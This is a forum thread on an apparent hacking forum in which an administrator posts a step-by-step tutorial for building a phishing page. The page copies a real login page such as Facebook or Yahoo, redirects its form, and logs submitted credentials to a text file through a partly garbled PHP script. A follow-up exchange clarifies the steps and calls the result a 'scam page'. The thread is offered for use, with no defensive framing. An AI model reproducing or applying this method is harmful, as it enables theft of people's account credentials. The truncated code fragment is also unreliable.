CYBER KENDRA
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Make Phishing Page from any site

2 posters

Go down

Make Phishing Page from any site  Empty Make Phishing Page from any site

Post by Admin Tue Feb 04, 2014 11:11 am

-- go to the real site u want to make a fake version of and save the complete page as index.htm
-- open index.htm with word or notepad or ur prefered text editor and search (ctrl+f) for the word action
-- the part u want will be somthing like this- facebook for example
action="https://www.facebook.com/login.php?login_attempt=1" method="post"
Or yahoo
form method="post" action="https://login.yahoo.com/config/login?"

--edit this line only as follows
form method="GET" action="login.php"

--change form method to GET and action to login.php and save the htm

-next u will need to create the login.php file ,heres how

-create a new txt file with notepad and paste the following code


Code:

$value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Change "example" to the url of the site u want to use yahoo or facebook etc

-save the file as login.php

-now u have all u need for ur fake page!!
-upload the 2 files,login.php and index.htm to a host and try it out! a new file will automaticaly be create called passes.txt which will contain the info .
Admin
Admin
Admin

Posts : 107
Join date : 2013-12-07
Age : 40
Location : United Kingdom

https://cyber-kendra.forumotion.com

Back to top Go down

Make Phishing Page from any site  Empty Re: Make Phishing Page from any site

Post by shawn.ong Mon Sep 29, 2014 9:04 pm

sorry what do you mean by the "example" in *Change "example" to the url of the site u want to use yahoo or facebook etc*?

shawn.ong

Posts : 1
Join date : 2014-09-29

Back to top Go down

Make Phishing Page from any site  Empty Re: Make Phishing Page from any site

Post by Admin Sun Jun 26, 2016 7:53 am

i gave facebook as example of scam page , for sure it can be any other website and change from 'post action' to 'get action' as in example bellow
Admin
Admin
Admin

Posts : 107
Join date : 2013-12-07
Age : 40
Location : United Kingdom

https://cyber-kendra.forumotion.com

Back to top Go down

Make Phishing Page from any site  Empty Re: Make Phishing Page from any site

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum